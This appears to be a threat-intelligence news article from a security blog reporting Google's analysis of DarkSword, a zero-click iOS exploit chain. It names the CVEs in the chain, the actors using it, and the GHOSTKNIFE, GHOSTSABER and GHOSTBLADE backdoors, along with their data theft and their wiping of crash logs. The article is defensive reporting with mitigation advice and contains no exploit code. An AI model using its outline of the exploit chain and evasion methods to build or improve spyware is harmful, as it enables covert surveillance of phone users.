iOS Exploit With iPhone Hacking Tools Attacking Users to Steal Data

Google’s Threat Intelligence Group (GTIG) has exposed DarkSword, a sophisticated full-chain iOS exploit targeting versions 18.4 to 18.7. This zero-click attack chains six vulnerabilities, four of which are exploited as zero-days, to grant attackers kernel-level access and deploy malware such as GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER.

Since November 2025, DarkSword has surfaced in campaigns by diverse actors, including commercial spyware firms and state-sponsored groups.

UNC6748 targeted Saudi users via a Snapchat-mimicking site (snapshare[.]chat), using obfuscated JavaScript and IFrames to load exploits while evading repeat infections through session storage checks. The chain evolved, adding support for iOS 18.6 and 18.7 via flawed loaders that fetch RCE modules such as rce_worker_18.4.js, despite logic bugs.

PARS Defense, a Turkish vendor, deployed DarkSword in Turkey (November 2025) and Malaysia (January 2026) with stronger OPSEC: encrypted payloads via ECDH/AES and device fingerprinting (e.g., Apple Pay checks, WebGL2 support). Their loaders correctly selected version-specific RCE workers, redirecting non-iOS devices to legitimate sites.

UNC6353, a suspected Russian espionage cluster, shifted from Coruna to DarkSword in Ukrainian watering holes by December 2025, persisting into March 2026. Malicious scripts on compromised sites loaded hidden IFRAMEs from static resources. cdncounter[.]net, bypassing checks with Russian-commented code. GTIG collaborated with CERT-UA for mitigation.

Post-compromise, DarkSword installs JavaScript backdoors tailored to actors.

• GHOSTKNIFE (UNC6748): Exfiltrates accounts, messages, browser data, location, and audio; supports screenshots, file downloads, and config updates over encrypted HTTP (ECDH/AES). It stores data in /tmp/<UUID>.<numbers>/STORAGE/erases crash logs (e.g., mediaplaybackd, SpringBoard) and uses custom binary protocols.​
• GHOSTSABER (PARS Defense): Enumerates devices/accounts, lists files/apps, runs SQL queries/SQLite, exfiltrates thumbnails/Photos, and executes JS. Table 1 outlines commands such as SendDeviceInfo, ExecuteSqliteQuery, and unimplemented ones (e.g., RecordAudio), hinting at modular extensions via shared memory.​

• GHOSTBLADE (UNC6353): A dataminer harvesting iMessage, Telegram, photos, crypto wallets, Safari history, and more (Table 2). It deletes diagnostic reports, includes debug logs, and has iOS 18.4+ migbypass for autobox evasion, suggesting broader compatibility.

DarkSword’s JavaScript-only chain avoids PPL/SPTM bypasses, using Web Workers for RCE. It starts with JavaScriptCore flaws:

• CVE-2025-31277 (iOS 18.4-18.5): JIT type confusion, patched in iOS 18.6.
• CVE-2025-43529 (18.6-18.7): DFG garbage collection bug, zero-day, patched 18.7.3/26.2.

Chained with CVE-2026-20700 (dyld PAC bypass, zero-day, iOS 26.3 patch).​

Sandbox escapes pivot WebContent → GPU (CVE-2025-14174, ANGLE OOB, zero-day, 18.7.3/26.2) → mediaplaybackd (CVE-2025-43510, XNU copy-on-write, 18.7.2/26.1). Final CVE-2025-43520 (XNU VFS race, 18.7.2/26.1) yields read/write primitives, allowing payloads to load libraries such as Native.js, FileUtils.js, and TaskRop.

GTIG reported flaws to Apple in late 2025; domains are blocked via Safe Browsing. Update to iOS 26.3+ or enable Lockdown Mode.​

DarkSword echoes Coruna’s proliferation, fueling espionage and surveillance. GTIG, Lookout, and iVerify urge vigilance amid rising exploit-as-a-service threats. ​

Site: cybersecuritypath.com

About the Author

John

Editor

I'm cybersecurity researcher and threat intelligence writer focused on malware campaigns, data breaches, OSINT, and emerging attack techniques. Passionate about breaking down complex security threats into clear, actionable insights.

Visit Website View All Posts